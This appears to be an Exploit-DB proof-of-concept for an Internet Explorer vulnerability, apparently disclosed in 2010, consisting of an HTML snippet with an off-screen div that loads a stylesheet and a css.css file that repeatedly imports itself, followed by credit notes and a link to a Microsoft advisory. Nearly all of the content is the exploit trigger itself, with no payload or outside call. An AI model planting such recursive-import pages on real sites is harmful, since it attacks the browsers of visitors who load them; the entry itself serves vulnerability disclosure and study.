23 lines
No EOL
654 B
HTML
Executable file
23 lines
No EOL
654 B
HTML
Executable file
<code>
|
|
<div style="position: absolute; top: -999px;left: -999px;">
|
|
<link href="css.css" rel="stylesheet" type="text/css" />
|
|
</code>
|
|
|
|
<code of css.css>
|
|
*{
|
|
color:red;
|
|
}
|
|
@import url("css.css");
|
|
@import url("css.css");
|
|
@import url("css.css");
|
|
@import url("css.css");
|
|
</code>
|
|
|
|
|
|
EDB Notes:
|
|
* Original credit goes to an unidentified researcher using WooYun anonymous account "???".
|
|
WooYun is a connection platform for vendors and security researchers:
|
|
http://www.wooyun.org/bugs/wooyun-2010-0885
|
|
|
|
* Dec 22, 2010 - Microsoft releases security advisory for this vulnerability:
|
|
http://www.microsoft.com/technet/security/advisory/2488013.mspx |